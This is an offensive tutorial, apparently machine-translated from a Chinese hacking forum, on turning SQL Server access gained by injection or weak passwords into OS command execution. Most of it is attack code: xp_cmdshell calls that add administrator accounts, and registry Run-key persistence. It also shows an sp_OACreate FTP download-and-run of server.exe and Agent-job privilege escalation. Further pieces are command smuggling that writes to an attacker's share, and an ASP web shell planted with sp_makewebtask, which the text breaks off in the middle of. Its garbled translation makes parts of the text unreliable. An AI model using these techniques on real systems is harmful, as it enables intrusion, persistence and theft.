Let's say a host has 1433 ports. What can we do with SQL injection or a remote connection with a null weak password to add a system administrator user (or execute a system command)?
1). xp_cmdshell ' cmd.exe/c net user aaa Bbb/add '
Everybody knows the way, the biggest benefit is to have the echo, but the most afraid
if exists (SELECT * from dbo.sysobjects WHERE id = object_id (N ' [dbo].[ xp_cmdshell] and OBJECTPROPERTY (ID, N ' isextendedproc ') = 1)
exec sp_dropextendedproc N ' [dbo]. [xp_cmdshell] '
You can delete this extended store by using the T-SQL statement above.
We can usually use
2k:
EXEC sp_addextendedproc xp_cmdshell, @dllname = ' Xplog70.dll '
SQL97:
EXEC sp_addextendedproc xp_cmdshell, @dllname = ' Xpsql70.dll '
Was restored.
But some people know that sp_addextendedproc is simply a stored procedure that can be deleted.
Drop PROCEDURE Sp_addextendedproc
if exists (SELECT * FROM
dbo.sysobjects WHERE id = object_id (N ' [dbo].[ xp_cmdshell] ') and
OBJECTPROPERTY (ID, N ' isextendedproc ') = 1)
exec sp_dropextendedproc N ' [dbo]. [xp_cmdshell] '
Restores:
CREATE PROCEDURE sp_addextendedproc---1996/08/30 20:13
@functname nvarchar (517),/* (owner.) Name of function to call/*
@dllname varchar (255)/* Name of DLL containing function */
As
Set Implicit_transactions off
If @ @trancount > 0
Begin
RAISERROR (15002,-1,-1, ' sp_addextendedproc ')
Return (1)
End
/*
* * Create the extended procedure mapping.
*/
DBCC ADDEXTENDEDPROC (@functname, @dllname)
Return (0)--sp_addextendedproc
Yes, it's written so much. There's one simple way to protect it:
First net stop MSSQLServer, then Xplog70.dll (SQL97 under Xpsql70.dll) deleted
Just open the service, okay?
2 Read the above you understand that xp_cmdshell can eventually be deleted, there is no other way?
There are written in the registry three:
Xp_regwrite ' HKEY_LOCAL_MACHINE ', ' SOFTWARE\Microsoft\Windows\CurrentVersion\Run ', ' czy82 ', ' REG_SZ ', net user czy BB/ Add
In fact, there are several places to write the registry, such as Web browsing settings in the registry
The bad way to write the registry is not only not echo, but not immediately. I don't know.
3)
DECLARE @s int
exec sp_oacreate "Wscript.Shell", @s out
--exec sp_OAMethod @s, "Run", NULL, "cmd.exe/c Echo Open Asp.7i24.com>c:\a.txt"
--exec sp_OAMethod @s, "Run", NULL, "cmd.exe/c echo 123321>>c:\a.txt"
--exec sp_OAMethod @s, "Run", NULL, "cmd.exe/c echo 123321>>c:\a.txt"
--exec sp_OAMethod @s, "Run", NULL, "cmd.exe/c Echo Get Server.exe>>c:\a.txt"
--exec sp_OAMethod @s, "Run", NULL, "cmd.exe/c echo Close>>c:\a.txt"
--exec sp_OAMethod @s, "Run", NULL, "cmd.exe/c ftp-s:c:\a.txt"
EXEC sp_OAMethod @s, "Run", NULL, "CMD.EXE/C server"
Yes, well, as you can see, we could use sp_OACreate and sp_OAMethod in their role.
Call the system's controls like Fso,wsh,shell or something, but there's a problem that's not as xp_cmdshell
See the results right away, really? Look at the following:
DECLARE @s int,@o int, @f int, @str nvarchar (4000)
/*exec sp_OACreate "Wscript.Shell", @s out
EXEC sp_OAMethod @s, "Run", NULL, "cmd.exe/c net User>c:\temp.txt" *
exec sp_oacreate "Scripting.FileSystemObject", @o out
EXEC sp_OAMethod @o, "OpenTextFile", @f out, "C:\temp.txt", 1
EXEC sp_OAMethod @f, "ReadAll", @str out
Print @str
The first thing to do is to execute the annotation inside and then execute outside the principle is very simple is to use > to write the results in a file and then use
FSO to read it out! very practical.
4)
Use msdb; --Don't be master here.
exec sp_add_job @job_name = ' czy82 ';
exec sp_add_jobstep @job_name = ' czy82 ', @step_name = ' exec My sql ', @subsystem = ' CmdExec ', @command = ' dir c:\>c:\b.txt ';
exec sp_add_jobserver @job_name = ' czy82 ', @server_name = ' smscomputer ';
exec sp_start_job @job_name = ' czy82 ';
Job processing with MSSQL can also execute commands and if the subsystem parameters above are TSQL, we can
Execute the TSQL statement.
For the use of these several stored procedures first in @server_name we want to specify your SQL Server name
The SQLServerAgent service of the second system must be opened (the default does not open the irritating bar)
Net start SQLServerAgent
There is another place for this dongdong that can be implemented by public. There's a system hole here, too, look underneath.
Use msdb
EXEC sp_add_job @job_name = ' Getsystemonsql ',
@enabled = 1,
@description = ' This'll give a privileged user Access to
xp_cmdshell ',
@delete_level = 1
EXEC sp_add_jobstep @job_name = ' Getsystemonsql ',
@step_name = ' Exec my sql ',
@subsystem = ' TSQL ',
@command = ' EXEC master. Xp_execresultset N ' select ' ' EXEC
Master.. xp_cmdshell "dir > C:\agent-job-results.txt" ', N ' Master '
EXEC sp_add_jobserver @job_name = ' Getsystemonsql ',
@server_name = ' Your SQL Server name '
EXEC sp_start_job @job_name = ' Getsystemonsql '
Do not doubt the above code I was a test success! Here we have to pay attention to xp_execresultset because of it, so.
So that we can execute xp_cmdshell with public.
5 About Microsoft SQL Agent jobs arbitrary files can remove overwrite vulnerabilities (public users can also)
There are articles in Angio: http://www.xfocus.NET/vuln/vul_view.PHP?vul_id=2968
Use msdb
EXEC sp_add_job @job_name = ' arbitraryfilecreate ',
@enabled = 1,
@description = ' This'll create a file called C:\sqlafc123.txt ',
@delete_level = 1
EXEC sp_add_jobstep @job_name = ' arbitraryfilecreate ',
@step_name = ' Sqla
FC ',
@subsystem = ' TSQL ',
@command = ' Select ' Hello, this file is created by the SQL Agent. '
@output_file_name = ' C:\sqlafc123.txt '
EXEC sp_add_jobserver @job_name = ' arbitraryfilecreate ',
@server_name = ' server_name '
EXEC sp_start_job @job_name = ' arbitraryfilecreate '
If subsystem chooses: TSQL has the following contents in the header of the generated file
?? 揂 rbitraryfilecreate?? 1, 揝 QLAFC????? 2003-02-07 18:24:19
----------------------------------------------
Hello, this file is created by the SQL Agent.
(1?????)
So I recommend to generate files best Subsystem Select CmdExec, if used well we can write a have add admin
The command's VBS file to the startup directory!
6 about sp_makewebtask (can write arbitrary content arbitrary file name file)
About Sp_mscopyscriptfile Look at the following example
DECLARE @command varchar (100)
DECLARE @scripfile varchar (200)
Set Concat_null_yields_null off
Select @command = ' dir c:\ > ' \\attackerip\share\dir.txt '
Select @scripfile = ' C:\autoexec.bat > nul ' + @command + ' rd '
exec sp_mscopyscriptfile @scripfile, '
Both of these things are still being tested.
Let MSSQL public users get a native Web shell:)
sp_makewebtask @outputfile = ' D:\sms\a.ASP ', @charset =gb2312,
--@query = ' SELECT ' '
--@query = ' select ' '
@query = ' SELECT '
Set oscript = Server.CreateObject ("WScript. SHELL ")
Set oscriptnet = Server.CreateObject ("Wscript.Network")
Set Ofilesys = Server.CreateObject ("Scripting. FileSystemObject ")
Szcmd = Request.Form (". CMD ")
If (Szcmd <> "") Then
Sztempfile = "C:\" & Ofilesys.gettempname ()
Call Oscript. Run ("cmd.exe/c" & Szcmd & ">" & Sztempfile, 0, True)